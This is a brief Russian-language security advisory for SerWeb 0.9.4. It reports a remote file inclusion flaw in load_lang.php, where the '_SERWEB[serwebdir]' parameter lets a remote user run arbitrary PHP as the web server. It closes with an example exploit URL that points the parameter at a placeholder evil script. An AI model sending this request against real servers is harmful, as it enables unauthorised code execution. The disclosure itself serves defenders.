Программа: SerWeb 0.9.4
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «_SERWEB[serwebdir]» сценарием load_lang.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://site.com/[path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script]